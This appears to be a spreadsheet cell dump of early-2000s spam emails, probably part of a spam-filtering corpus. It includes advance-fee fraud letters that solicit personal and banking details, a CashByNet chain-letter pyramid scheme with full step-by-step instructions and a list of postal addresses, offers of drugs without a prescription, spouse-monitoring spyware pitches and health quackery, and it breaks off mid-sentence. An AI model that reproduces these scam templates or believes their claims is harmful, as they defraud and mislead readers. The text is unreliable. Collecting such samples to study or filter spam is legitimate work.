THE TWO PARTIES AT THE COURSE OF THIS TRANSACTION.THEREFORE YOU ARE 
EXPECTED TO REPLY THIS LETTER INDICATING YOUR READINESS AND INTEREST TO 
PARTICIPATTE IN THIS BUSINESS. 
AFTER RECEIVING YOUR REPLY, YOU WILL BE COMMUNICATED TO WITH THE EXACT 
STEPS TO TAKE. 
I EXPECT YOUR URGENT RESPONSE EITHER BY EMAIL TO :othema2002@37.com    
 TO ENABLE US CONCLUDE THIS TRANSACTION ON YOUR REPLY I SHALL CALL YOU AND GIVE 
YOU MY PHONE NUMBER FOR SECURITY REASONS.
URGENTLY. 
PLEASE TREAT THIS BUSINESS PROPOSAL AS STRICTLY CONFIDENTIAL FOR 
SECURITY REASONS. 
KIND PERSONAL REGARDS, 
Thema Ordi
Tel:27 83 6919246</t>
  </si>
  <si>
    <t>$7.95 Power HostingLimited Time Offer:  Sign up and getFREE DOMAINand Free setupÂ 150 MB Hosting25 Pop E-MailsSecure ServerUnlimited TransferContent PromoYour-Name.comYour own cgi-bin 24/7 FTP AccessDetailed Statistics Plus much more!
Our Equipment: 
Â  Â </t>
  </si>
  <si>
    <t xml:space="preserve">FROM:MR JOE MARK
EMAIL FAX: 1 561 619 2791
EMAIL:mrjoemark@yahoo.comDEAR SIR
REQUEST FOR URGENT BUSINESS RELATIONSHIP ï¿½ STRICTLY
CONFIDENTIAL.
Firstly, I must solicit your strictest confidentiality
in this transaction. This is by virtue of its nature
as being utterly CONFIDENTIAL and ï¿½TOP SECRET.ï¿½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off-shore
accounts, hence your importance in the whole
transaction. My colleagues and I have agreed that if you or your
company can act as the beneficiary of this funds on
our behalf, you or your company will retain 20% of the
total amount of US$11,500,000.00 (Eleven Million Five
Hundred Thousand United States Dollars), while 70%
will be for us (members of this panel) and the
remaining 10% will be used in offsetting all
debts/expenses incurred (both local and foreign) in
the cause of this transfer. Needless to say, the trust
reposed on you at this juncture is enormous. In return
we demand your complete honesty and trust. It does not matter whether or not your company does
contract projects of this nature described here, the
assumption is that your company won the major contract
and sub-contracted it out to other companies.  More
often than not, big trading companies or firms of
unrelated fields win major contracts and subcontract
to more specialized firms for execution of such
contracts. We are civil servants and we will not want
to miss this once in a life time opportunity.You must however, NOTE that this transaction will be
strictly based on the following terms and conditions
as we have stated below, as we have heard confirmed
cases of business associates running away with funds
kept in their custody when it finally arrive their
accounts. We have decided that this transaction will
be based completely on the following: (a). Our conviction of your transparent honesty and
diligence. (b). That you would treat this transaction with utmost
secrecy and confidentiality. (c). That upon receipt of the funds, you will promptly
release our share (70%) on demand after you have
removed your 20% and all expenses have been settled. (d). You must be ready to produce us with enough
information about yourself to put our minds at rest. Please, note that this transaction is 100% legal and
risk free and we hope to conclude the business in Ten
Bank working days from the date of  receipt of the
necessary information and requirement from you. Endeavour to acknowledge the receipt of this letter
using my email fax number 1 561 619 2791 or my email
address mrjoemark@yahoo.com. I will bring you into
the
complete picture of the transaction when I have heard
from you. Your urgent response will be highly appreciated as we
are already behind schedule for this financial
quarter. Thank you and God bless. Yours faithfully, Mr Joe Mark__________________________________________________
Do You Yahoo!?
LAUNCH - Your Yahoo! Music Experience
http://launch.yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
The Easiest Way to Discover the Truth about Anyone
NetDetective 7.0 is an amazing new tool that allows you to dig up facts about anyone. It is all completely legal, and you can use it in the privacy of your own home without anyone ever knowing. It's cheaper and faster than hiring a private investigator.Instantly locate anyone's e-mail address, phone number or address
Get a copy of your FBI file 
Find debtors and locate hidden assets 
Check driving and criminal records 
Locate old classmates, a missing family member, a long-lost love 
Investigate your family history - births, marriages, divorces, deaths Gain access to social security records 
Discover little-known ways to make untraceable phone calls And a lot more ...
Click here for instant download
Endorsed by the National Association of Independent Private Investigators (NAIPI)
Â 
Â 
You received this email because you signed up at one of Offer888.com's websites or you signed up with a party that has contracted with Offer888.com. To unsubscribe from our newsletter, please visit http://opt-out.offer888.net/?e=jm@netnoteinc.com. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Fix your Bad Credit NOW! Simply Click Here and fill out the form. For only
a few pennies a day, get access to our team of specialized attorneys to
solve your problem now.Click here and send an email to stop all future offers
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â               Â IRS TAX 
              PROBLEMS?              Â 
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â  
It's Time toÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
              EliminateÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  
              your IRS tax problemsÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â  
              NOW!              Â 
Â Â  
              Let Our Qualified People HELP You              Â               We Can Settle Your Back Taxes For PENNIES On The Dollar              Â Respond 
                now and one of our Debt Pros will get back to you within 48 
                hours.CLICK HERE!
If You wish to be removed from future mailings please "Clicking 
Here" . 
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">Joke-A-Day  Â Human Growth Hormone Precursor Receive 2 $89.95 bott!
les of NeoTropin hGH free as our gift and save $20 dollars on each new bottle! That's $419.90 total Annual savings! Vitafactory.com cares about the health and well being of you and your family. To help get you started, we're proud to offer 2 free bottles ofÂ  NeoTropin hGH.Â  As a program member, you will also receive a discount of $20 dollars for each subsequent purchase of NeoTropinÂ Â  Click Here For More Information!Today's Joke ~~~~~~~~~~~~~~~~  Anorex The first weight-control compound designed to mitigate the profound effect that variations in the human genetic code have on the storage, use, and disposition of body fat.  Buy Here  Â Popular Products!Â &amp;nb!
sp;  Weight LossÂ  Neotropin HGH Breast Care hGH Products Sexual Stimulation Cellulite Eraser Lip Plumper Dermal XL - Libido Bone &amp; Joint Miracle Thigh Cream Mens Products DHEA ProductsÂ  Nugesterone General Nutrition FitnessProductsÂ  ProEstron Pro hGH Sport Women Â Â Â Unsubscribe:Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">8800JWXS6-165kYbB8203GssW1-200otHp6418l36SPRING BLOW OUT SALE
GREAT SEX IN THE BOTTLE
For men &amp; women
Guaranteed to restore the urge! 
And enhance the pleasure and health!
Two for price of one http://81.9.8.40/cgi-bin/herbal/index.cgi?10394Exclude yourself, john195615221@yahoo.com
5363PIMF9-885VmHQ8619nrwV6-745XQHk5559Isl38
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â 
Dear 
              Homeowner,Â               *6.25% 
              30 Yr Fixed Rate MortgageInterest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
              aNO 
              COST OUT OF POCKET              aNO 
              OBLIGATION               aFREE 
              CONSULTATION               aALL 
              CREDIT GRADES ACCEPTED 
Rates as low as 
              6.25% won't stay this low forever CLICK HERE              Â 
              * based on mortgage rate as of 5-15-02 as low as 6.25% see lender 
              for details              Â H
Apply 
                now and one of our lending partners will get back to you within 
                48 hours.CLICK HERE!
To Be Removed Please "Clicking 
Here" . </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</si>
  <si>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Euro:http://www.new-opps4u.com/eurocurrencyexchange/In addition to our currency report, you can receive:*  FREE trading software for commodities and currencies
*  FREE online trading advice via email
*  FREE trading system for stock and commodity tradersFind out how the new Euro will affect you.  If
you are over age 18 and have some risk capital, it's
important that you find out how the Euro will
change the economic world. CLICK NOW!http://www.new-opps4u.com/eurocurrencyexchange/
$5,000 minimum investmentPlease carefully evaluate your financial position before
trading.  Only risk capital should be used.
http://www.new-opps4u.com/TakeMeOff/ To OptOut</t>
  </si>
  <si>
    <t xml:space="preserve">Do you agree?There are exceptions of course, but generally, technically minded-people
aren't very 
comfortable wiith having to sell. I've spent the last 8 years teaching people in engineering and other
technical companies 
the best way to go about finding new customers, handling enquiries and
closing sales. We run the 'Selling for Engineers' seminar in-house for companies of any
size, both in the 
UK and worldwide. 
The content of that seminar is contained in the 'Selling for Engineers'
manual. price Â£27.00 
UK pounds Other titles are: 'How to Hire a Good Technical Salesperson',
'How to Create 
Powerful Technical Sales Literature' and 'Prospecting for Engineers'. Each
of these titles is 
priced Â£37.00.If you want to sell your products in the UK we can supply accurate
prospecting databases 
for virtually all activities and products. The UK Technology Database has
285,000 
engineering, technical and scientific companies, price Â£79.00Other specialised databases: Computing 22,159 records, Construction,
240,299 records, 
Education, 39,416 records, Garage Services 71,933 records, Medical, 56,037
records, 
Hospitality, 80,210, Insurance and Finance, 27,983, Professionals,
186,126, Retail, 
157,859, Sport &amp; Leisure, 38,972, Transport, 67,262, Manufacturers,
52,227. Price Â£99.00  
each. If you can't see what you need, please contact us, we have more than
can be listed 
here. Also 40,000 validated, UK technical company e-mails Â£600.00 or 3
pence each. Min 
order Â£45.00.Contact Robert Seviour, UK Technology Database Ltd. 
1 East Bay, North Queensferry, Fife, KY11 1JX, Scotland, UK
Tel: +44 (0)1383 411 900   Fax: +44 (0)1383 411 656
e-mail:  ukdatacd@totalise.co.uk
</t>
  </si>
  <si>
    <t xml:space="preserve">Best 
Prices AlwaysExperience This POTENT 
Pheromone Formula That Helps 
Men and Women Attract Members of The Opposite Sex 
Click here to learn more:Ever wonder why some people are always surrounded by members 
of the opposite sex?
Now YOU 
Can...................
*Attract 
Members of The Opposite Sex Instantly
* 
Enhance Your Present Relationship
* Meet New People Easily
*Give yourself that additional edge
* Have people drawn to you, they won't even know whyHere To Visit Our Website
Read What Major News Organisations Are Saying About Pheromones!
Delete
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello 
THIS E-MAIL AD IS BEING SENT IN FULL COMPLIANCE WITH U.S. SENATE BILL 1618, TITLE #3, SECTION 301TO REMOVE YOURSELF SEND A BLANK E-MAIL TO: removal999@yahoo.com
=====================================================================================
YOU ARE GETTING THIS EMAIL BECAUSE YOU ARE ON A LIST OF PEOPLE THAT WANT ALL THE MONEY  THEY  CAN SPEND WITHOUT WORKING FOR IT...YOU WILL ONLY GET THIS ONCE, SO PLEASE DO NOTHING  
IF YOU WOULD LIKE TO BE REMOVED! (By Doing nothing you will automatically be removed )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vacation.We want the type of people that would like to send their children to "Harvard" or 
"Stanford" and have these educations paid for through money generated while they sleep or 
while they are on vacation.We want the type of people that see a new T-Bird, Corvette or Jaguar and want to own these 
cars and have them paid for through money generated while they sleep or while they are on 
vacation.We want the type of people that on a whim want to travel to maybe Maui in the winter or 
Alaska in the summer and while there if they choose to buy a home in either place, they can 
do so through money generated while they sleep or while they are on vacation.We want the people that would like to sleep till noon if they choose to or get up and go to 
the country club to play golf if they choose to and do so because they always have a stream 
of income through money generated while they sleep or while they are on vacation.We want the type of people that truly hate the thought of getting up in the morning and 
making money for some one else.We want the type of people that deep down want to tell some snob that thinks he's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vacation.Seriously, if you want more money than you can spend and you really, truly DO NOT WANT TO 
WORK, then you are the type of person we are looking for.If you would like to know why some people can do this...then simply send a blank email with 
the words: "I HATE TO WORK" in the subject area to:
ihatetowork99@yahoo.comAfter doing so, you will be contacted in less than 24 hours and learn how to get the house 
you want, the education for your children that you would like them to have, go on the 
vacation you want, when you want all through money generated while you sleep or while you 
are playing golf or while you are on vacation.Also, we do not want you to hear from us again if the idea of making all the money you want 
is not exciting to you...therfore this is the first and last email you will get unless we 
hear from you...so if you want TO GET RICH with out working, then simply send a blank email 
with the words: "I HATE TO WORK" in the subject area to:
ihatetowork99@yahoo.com
 Thank you,"The I hate to work" associatesSubject:  I don't work...but I have a ton of money!iqccjypkiducrbiixmqcuncw
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by Pharmacy Online (ookrmkdg@yahoo.com) on Sunday, May 19, 19102 at 12:53:32
---------------------------------------------------------------------------body: 
**Viagra Without A Doctor's Appointment!!**Fill Out Our Simple Online Form
**Our Doctor's Will Approve You In Minutes!**Receive Your Prescription In 24 Hours By Fed Ex!!**Other Prescriptions Are Available Also!Click below:
http://www.globalrxco.com/main2.php?rx=16864********************************************************************************************To be removed from future mailing, please click below
http://61.129.81.68/remove/remove.htm****************************************************************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0163---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t>HAVE A SECURE SWISS SECRET INTERNET ACCOUNT WITH ATM CARDNo Corporation formation needed.Only such account backed by Swiss Government.Account under Swiss Banking Secrecy.No Personal appearance necessary.Stable Swiss Government and Economy. Swiss Bancomat ATM card included at no extra cost
Good at over 420,000ï¿½ ATM machine locations world wide.Complete PRIVATE Internet access and control with triple security key code protectionHave this extra convenience and security today. Get full details at http://swissatm.comThe email is not unsolicited and complies with
industry standard guidelines. If you have any questions
please contact us at</t>
  </si>
  <si>
    <t xml:space="preserve">A Money Making Home Business for You!
Â© Copyright 2002, All Rights Reserved.
__________________________________________________________Your e-mail address has been verified as one that has requested information on these offers.
All e-mail addresses have been double verified. If this message has come to you in error,
please click REMOVE ME and your name will be removed from all future mailings.
__________________________________________________________
</t>
  </si>
  <si>
    <t xml:space="preserve">FIND OUT WHO THEY ARE CHATTING/E-MAILING WITH ALL THOSE HOURS!Is your spouse cheating online? Are your kids talking to dangerous people on instant messenger?
Find out NOW! - with Big Brother instant software download.
Click on this link NOW to see actual screenshots and to order!
http://213.139.76.69/ec/bigbro/M30/index.htmTo be excluded from future contacts please visit:
http://213.139.76.69/PHP/remove.php
danie
</t>
  </si>
  <si>
    <t>Lower your mortgage rate and/or payment! FREE Quote!
http://hey11.heyyy.com/freeservices/mortgage/Extend your car's warranty! Even older cars. 
Save 40-60% off regular price! FREE Quote!
http://hey11.heyyy.com/freeservices/warranty/Life Insurance -- just pennies a day! FREE Quote!
You can save BIG here!
http://hey11.heyyy.com/freeservices/termquote/Top Drawer Lawyers -- working for YOU! Just pennies a day. 
Find out more for FREE!
http://hey11.heyyy.com/freeservices/legalservices/==============================================
To unsubscribe, use the link below.
http://hey11.heyyy.com/removal/remove.htm
Allow 72 hours for removal.</t>
  </si>
  <si>
    <t>CommentaryIt is time to refinance!Your credit does not matter, we can approve anyone.Now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http://64.21.33.238/74205/Or site 2
http://64.21.33.238/74206/
Erase
http://64.21.33.238/optout.htm</t>
  </si>
  <si>
    <t xml:space="preserve"> Â &lt;!--#rotate&gt;Terific!!   Instantly S e x u a l l y Attract with nature's secret weapon... Pheromones!! Â Â *****Invisible and undetectable, when unknowingly inhaled, Pheromone Concentrate  unblocks all restraints and releases the raw  animal s e x drive!This is the strongest concentration of HUMAN Pheromones, allowed by law, in an essential oil base.Available in formulas for both men and women.
To learn more:  CLICK HERE TO ATTRACT 
********
To be deleted from our mailing list please email us at jane98@firelord.com with "delete" in the sub-line.1.5.5.8{%IP=55.76.182.57%}
TO 48 5-19 C4 P{%RAND%}
hasgdhjgasdgasdkasdasjdg
</t>
  </si>
  <si>
    <t xml:space="preserve">
Doctors Online
Viagra
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con-tains finasteride.
ORDER NOWClick Here to be removed, and you will *never* receive another email from us! Thank you.hope
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, jm@netmore.netHuman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Click HereYou are receiving this email as a subscriberto the Opt-In America Mailing List. 
To remove yourself from all related maillists,just Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">1075RxOo9-26l11INCREASE YOUR GAS MILEAGEIt's easy and fast
Anyone can install
Works on ANY automobile engine
Improves engine performance
Tested by a recognized EPA Testing Laboratory
GUARANTEED 100%http://81.9.8.40/cgi-bin/fuelmax/index.cgi?10564joe194515085@yahoo.com
7176wbXV7-572KhIe3021SSOm3-741OdYj0683YBff8-525iYl46
</t>
  </si>
  <si>
    <t>Low-Cost Term-Life Insurance!
SAVE up to 70% or more on your term life insurance policy now.
CLICK HERE NOW For your FREE Quote!
 http://hey11.heyyy.com/insurance/Example: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</si>
  <si>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 xml:space="preserve">.Â Â  These are REAL people with REAL livecameras and movies!http://www.damiansangelz.com/accounts/hosting/annaÂ Why not come take a look for yourself??         If you have questions
        please contact me
Click here to
        avoid this in the future 
</t>
  </si>
  <si>
    <t>Thank you for your interest!Judgment Courses offers an extensive training
course in "How to Collect MoneyJudgments"If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uncollectedMoney
Judgment debt . For every Judgment that is paid, 5more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on"After only having this course for four months, Larry S. in
area code 314 stated to us: "I am now making $2,000.00 per
week and expect this to grow to twice this amountwithin the
next year. I am having a ball. I have over $250,000 in
judgments I am collecting on now"After having our course for 7 months Larry S. in 314 stated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part.Please call us at 1-281-500-4018.We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This ad is produced and sent out by:
UAS
To be deleted  from our mailing list please email us at roanna@elitists.com with "delete" in the sub-line.
or write us at:AdminScript-Update, P O B 1 2 0 0, O r a n  g e s t a d, A r  u b a
++++++
TO48 5-19 C18 P3245611515161654646565unbelievable
unbelievable
processing----------- for--------- your------------ futureunbelievable</t>
  </si>
  <si>
    <t>MCLE Seminars
Click 
            here 
            to be removed from our email list.
July 
              6-7 , 2002
              Cost: $795*
              Held at the HILTON Waikola Village, Hawaii
              Register and pay by May 31 and recieve 10% off! ($715.50)
*air, 
              hotel, and activities not included
"The 
              presentation was extremely informative and entertaining." 
"Fun 
              for the whole family... A great reason to take a vacation!"
**** 
            Limited Space Available 
            ****Hours
Includes 
                        12.5 hours of participatory:
6.0
                        Ethics
3.0
Substance 
                        Abuse
1.5
Emotional 
                        Distress
1.0
Elimination 
                        of Bias in the Legal Profession
1.0
General 
                        Legal EducationAudio Materials for remaining MCLE 
                        credits will be available at the seminar.
Brought 
                    to you by:
Â 
Bar 
                          Approved Curriculum
Approved 
                          by Arizona, Arkansas, California, Georgia, Idaho, Iowa, 
                          Kansas, Louisiana, Maine, Missouri, Montana, Nevada, 
                          New Hampshire, New Mexico, North Carolina, North Dakota, 
                          Oregon, Pennsylvania, South Carolina, Tennesee, Texas, 
                          Utah, Virginia, Washington State, and Wisconsin Bar 
                          Associations. Approval pending for Alabama and Minnesota.Call 
                     Attorney Connections at (800) 
                    221-8424 
                    to reserve your package today! 
OR: 
                    Click here to print the reservation form and fax to (760) 
                    731-7785; or 
                    mail to: Attorney Connections, P.O. Box 1533, Bonsall, CA 
                    92003</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</si>
  <si>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
  </si>
  <si>
    <t>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</si>
  <si>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 xml:space="preserve">Free Debt Consolidation InformationFree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on.Become Debt Free...Get Your Life Back On Track!All credit accepted and home 
ownership is NOT required.
 Not Another Loan To Dig You Deeper In To Debt!Â• 100% Confidential - No Obligation - Free Quote Â• Free Debt Consolidation Quote
If you have $4000 or more in debt, a trained professional will negotiate with your creditors to:Lower your monthly debt payments up to 60%End creditor harassmentSave thousands of dollars in interest and late chargesStart improving your credit ratingComplete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send and email to miguelstgermaine1618@swirve.comesiroomkozucxfpo
</t>
  </si>
  <si>
    <t xml:space="preserve">THIS E-MAIL AD IS BEING SENT IN FULL COMPLIANCE WITH U.S. SENATE BILL 1618, TITLE #3, SECTION 301TO REMOVE YOURSELF SEND A BLANK E-MAIL TO:removal992002@yahoo.comFREE Sample ! FREE Tape!New Cosmetic Breakthru!Look 10 Years Younger in (6) weeks or Less!Look Good Duo..From the INSIDE out.....
&gt;From the OUTSIDE in!Introducing....Natures answer to FASTER
and more OBVIOUS RESULTS for:** WRINKLES
** CELLULITE
** DARK CIRCLES
** BROWN SPOTS...
** LIFTS THE SKIN
** STRENGHTENS THE HAIR AND NAILSAlso Helps to........* Reduce Cell Damage From Excessive Sun Exposure
* Stimulate Colllagen Formation
* Provide Protection Against Skin Disorder
* and is HOPOALLERGENICFind Out WHAT! WHERE! AND How!TO ORDER YOUR FREE SAMPLE AND TAPE SEND YOUR
REQUEST TO:LOOKYOUNGNOW2000@YAHOO.COMSubject: subscribe to Free Sample:Your Name: ...................
Street address: ..............
City: ........................
State and zip code: ..........
Email address: ...............
sxjrohvneydjgucyfa
</t>
  </si>
  <si>
    <t>FROM=SEKO MOSHOOD MOBUTUTel=234-1-776-2397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(50 million US DOLLARS is
my share of
 my
 father's
estate. I boxed and shipped the money to a security
company
 abroad at the
peak of the war/political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follows:1. A letter of committment (duely signed) that you
will keep the
transaction strictly confidential.
2. Your confirmation of your ability to handle this.
3. Your international identity or driving licence
number for
 identification
to the security company.
4. Your telephone and fax numbers for communication.
5.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father'sestate.
 I am waiting for your response to enable us proceed.
 Regards,
Moshood Seko Mobutu</t>
  </si>
  <si>
    <t>Dear Sir/MadamOur company is designer and manufacturer of digital voice recorders (DVR) Edic-mini http://www.telesys.ru/english/edic-mini.shtml with extraordinary characteristics:
Edic-mini model A - the smallest size over the world (17x57x10 mm), up to 1120 min of record time.
Edic-mini model B - the longest battery life (up to 70 hours in record mode, metal case 27x54x7 mm), up to 1120 min of recording time.
Edic-mini model B1 - the roundest DVR in the world :-) (metal case d=30 mm, h=14 mm), up to 1120 min of recording time.
Edic-mini model C - the longest recording time (up to 8960 min =149 hours), metal case 27x54x10 mm.
   Coming soon:
Edic-mini model S - stereo digital voice recorder.
Edic-mini BW1 - round wood (juniper) case (for lovers of juniper fragrance :-), the most stylish DVR in the world.All digital voice recorders have extremely high voice sensitivity, digital PC interface, telephone line interface to record phone conversations, programmable user's interface, ability of using it for data storage and transfer (capacity from 16Mbyte to 1Gbyte).Also we produce voice modules (assembled PCB only) EMM http://www.telesys.ru/english/modules.shtml, which are Edic-mini compatible and allow you to create your own solution of unique DVR.We are looking for dealers for selling our product, but pls note, that we don't offer cheap product, we offer unique one - it has no competitors in the word market now. We are ready to design and produce any kind of DVR upon your request. Low volume order (100+) is acceptable too.Welcome to our website http://www.telesys.ru/english to get more information.*** Sorry, if this information isn't interesting for you. To remove your address from our mailing list pls return this e-mail back with REMOVE in subject field .Thank you.With best regards,
-------------------------------------
Yana Korshun,
Sales manager of "Telesystems"
E-mail: isales@telesys.ru
WWW site in Russian: http://www.telesys.ru
WWW site in English: http://www.telesys.ru/english
NEVER SEND SPAM. IT IS BAD.</t>
  </si>
  <si>
    <t xml:space="preserve">Return-Path: 
Received: from [216.35.187.6] (HELO webmillion.com)
  by mx12.cluster1.charter.net (CommuniGate Pro SMTP 3.5.9)
  with ESMTP id 4992751 for knb4menu@charter.net; Fri, 26 Apr 2002 08:09:39 -0400
Received: from es-wmstage1 [216.35.187.6] by webmillion.com with ESMTP
  (SMTPD32-6.04) id ADFB9700C8; Fri, 26 Apr 2002 04:55:33 -0700
Received: from mail pickup service by es-wmstage1 with Microsoft SMTPSVC;
	 Fri, 26 Apr 2002 02:12:54 -0700
From: "webMillion" 
To: 
Subject: Hello
Date: Fri, 26 Apr 2002 02:12:54 -0700
X-Priority: 3
X-MSMail-Priority: Normal
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Message-ID: 
X-OriginalArrivalTime: 26 Apr 2002 09:12:54.0431 (UTC) FILETIME=[8C6632F0:01C1ED02]Copyright CashByNet 2000 (http://www.cashbynet.net)
.If you're sick of scams, then read this, and do what it says.I WILL MAKE YOU A PROMISE. Read this email to the end, follow the
instructions, and you won't have to worry about funding your
retirement, having money to play, or making ends meet... EVER. I
know what you are thinking. I never responded to one of these
before either. Then one day I realized that I throw away $25
going to a movie for 2 hours with my wife, why not try investing
this same $25 in a system that just might work. I don't know why
that day I decided to take a chance, but I can't even come close
to imagining if I hadn't - I guess I'd still be poor.Read on.  It's true. Every word of it. It's legal, and it's ethical.
Not only are you making money from your own business, you're
helping other people achieve their goals and fulfill their dreams.
Give it a shot, you'll see there is absolutely no way you won't get
AT LEAST a modest return on your start up capital.
Okay - here's the scoop on CashByNet (CBN):==================================================Due to the popularity of this particular email business, and the
business potential of the Internet, a national weekly news program
recently devoted an entire show to the investigation of this program
to see if it's legal, and if it really can make people money.Their findings proved that there are "absolutely NO LAWS prohibiting
the participation in the program, and if people can follow a few
simple instructions they are bound to make amazing returns with only
$25 in startup costs."DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT THIS PROGRAM HAS
ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.  THE MORE PEOPLE
WHO PARTICIPATE, THE BETTER OFF YOU BECOME, AND THE MORE INCOME YOU
WILL MAKE.This is what one had to say:"I was approached many times before to participate in Cash By Net, but
each time I passed on it. One day I decided that instead of going out
that night, I would take the money I would have spent - invest it in
this business, and see if it was as lucrative as everyone claimed.
Two weeks went by . . . . nothing.  Three weeks . . . . $50 dollars
rolled in.  At this point I was just relieved to get my money back.
Then it happened - One week after this, I opened my mailbox to find
$580 in $5 bills waiting for me.  Its been about 8 months now, and I
just bought a new Mercedes . . . black :)  The startup costs are so
small, and the time involved is less than 5 hours per week.
Give it a shot - what do you have to lose?"Pam Hedland, South Bound Brook, New Jersey.
==================================================Another said:"Programs like this have been around for a long time but I never
believed in them. But this year I won a $50 bet on the Patriots to
win the Super Bowl.  I got this email the following morning, and I
felt like gambling.  I spent $25 ordering the reports, and the other
$25 paying a parking ticket.  I followed the instructions
meticulously - I thought I would at least get my original $25 back.
As soon as I got the email out, not One week went by before I quadrupled
my $25.  I'd take that over the Patriots any day.  I got excited, and
that's when it started to explode.  In less than 6 weeks I was already
up $9500 bucks.  It's been almost 4 months, and the flow hasn't stopped.
On an average day, I get anwhere from $500 - $1500 in the mail.  I always
say that everything happens for a reason, and I feel that this was meant
to be, maybe it is for you too. Just stick to the steps, do everything it
says - and all of your hopes and dreams will be real - I promise."Greg Moran, Boston, MA.For more success stories and photos, go to http://www.cashbynet.net$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$FOLLOW THE SIMPLE INSTRUCTION BELOW AND YOUR FINANCIAL DREAMS WILL COME
TRUE, GUARANTEED.BE SURE TO SAVE A COPY OF THIS EMAIL AS A TEXT DOCUMENT FOR REFERENCE!!!!
INSTRUCTIONS:=====Order all 5 reports from your personal CBN money list below =====For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE REPORT YOU ARE
ORDERING and YOUR E-MAIL ADDRESS to the person whose name appears ON
THAT LIST next to the report. MAKE SURE YOUR RETURN ADDRESS IS ON YOUR
ENVELOPE TOP LEFT CORNER in case of any mail problems.=== MAKE SURE YOU ORDER EACH OF THE 5 REPORTS ===
You will need all 5 reports so that you can save them on your computer
and redistribute them. YOUR TOTAL START UP INVESTMENT: $5 X 5 = $25.00.Within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OR SEQUENCE OF THE PEOPLE WHO ARE
LISTED NEXT TO EACH REPORT.  FOLLOW THE INSTRUCTIONS 1-6 VERY CLOSELY
OR YOU WILL LOSE OUT ON THE MAJORITY OF THE PROFIT WHICH IS DUE TO
YOU!! Once you understand the way this works, you will also see how
it does not work if you alter it. Remember, this method has been
tested, and proved and if you alter it, it will NOT work !!!This is a legitimate BUSINESS. You are offering a product for sale and
getting paid for it. Treat it as such and you will be VERY profitable
in a short period of time, and have something many people can't - a
profitable business enterprise (and more money to do WHATEVER YOU COULD
POSSIBLY WANT).For more information go to http://www.cashbynet.net==================================================
HERE IS YOUR PERSONAL CBN MONEY LIST :
==================================================REPORT# 1: 'The Insider's Guide To Advertising for Free On The NetOrder Report #1 from:Chris King
905 HWY 321 NW PMB 131
Hickory, NC 28601
_______________________________________________________REPORT # 2: The Insider's Guide To Sending Bulk Email On The NetOrder Report # 2 from:Greg Ferris
264 S. Cienega Blvd. #1066
Beverly Hills, CA 90211
USA_______________________________________________________REPORT # 3: Secret To Multilevel Marketing On The NetOrder Report # 3 from :
Tami C. Ickes
1667 Cumberland Road
Bedford, PA 15522
USA_______________________________________________________REPORT # 4: How To Become A Millionaire Using MLM &amp; The NetOrder Report # 4 from:B. Turner
60 McKerrell Way SE
Calgery, Alberta, Canada
T2Z 1R7_______________________________________________________
REPORT #5: How To Send Out One Million Emails For FreeOrder Report # 5 From:J.Thomas
16 Spaulding Ave.
Scituate, Ma. 02066
USA_______________________________________________________ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY. Notes: Always send $5 USD
cash for each Report. Checks NOT accepted. Make sure the cash is
concealed by wrapping it in at least 2 sheets of paper. On one of those
sheets of paper, Write the NUMBER &amp; the NAME of the Report you are
ordering,
YOUR E-MAIL ADDRESS, your name AND postal address.
_______________________________________________________PLEASE READ ON . . .=======================
IMPORTANT!! STEPS 1-6
=======================1.. After you have ordered all 5 reports from your CBN money list, take
this original saved email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Position.PLEASE MAKE SURE you copy every name &amp; address ACCURATELY!
This is critical to YOUR success.==================================================
**** SAVE THE NEW MODIFIED EMAIL, AS THIS WILL BE THE OFFICIAL DOCUMENT
WHICH YOU WILL SEND TO PROSPECTIVE CUSTOMERS. BE SURE TO HAVE YOUR NAME
IN THE #1 POSITION AND THAT YOU DO NOT MAKE ANY OTHER CHANGES TO THIS
DOCUMENT. THIS IS CRITICAL TO THE PERFORMANCE OF YOUR BUSINESS AND
SUBSEQUENTLY THE SIZE OF YOUR PROFITS.****As soon as you receive all 5 reports via email SAVE A COPY OF THEM!
These are the products that your customers are paying for. Not only do
these reports hold the secrets and instructions for your new venture,
you will be redistributing them to customers when you receive payment.
To assist you with marketing your business on the internet, the 5
reports will provide you with valuable marketing information on how to
send bulk e-mails legally, where to find thousands of free classified
ads and much more.There are 2 Primary methods you will use to get this venture going:
METHOD # 1: BY SENDING BULK E-MAIL LEGALLY
==================================================Let's say that you decide to start small, just to see how it goes,
and we will assume You and those involved send out only 5,000 e-mails
each. Let's also assume that the mailing receive only a 0.2%
(2/10 of 1%) response (the response could be much better but lets just
say it is only 0.2%). Also many people will send out hundreds of
thousands e-mails instead of only 5,000 each). Continuing with this
example, you send out only 5,000 e-mails.With a 0.2% response, that is only 10 orders for report # 1.  Those 10
people responded by sending out 5,000 e-mail each for a total of 50,000.
Out of those 50,000 e-mails only 0.2% responded with orders. That's=100
people responded and ordered Report # 2.Those 100 people mail out 5,000 e-mails each for a total of 500,000
e-mails. The 0.2% response to that is 1000 orders for Report # 3.Those 1000 people send 5,000 e-mail each for a total of 5 million e-mail
sent out. The 0.2% response is 10,000 orders for Report # 4.Those 10,000 people send out 5,000 e-mails each for a total of 50,000,000
(50 million) e-mails. The 0.2% response to that is 100,000 orders for
Report # 5.THAT'S 100,000 ORDERS TIMES $5 EACH = $500,000.00 (half a million
dollars).Your total income in this example is: 1..... $50 + 2..... $500 + 3.....
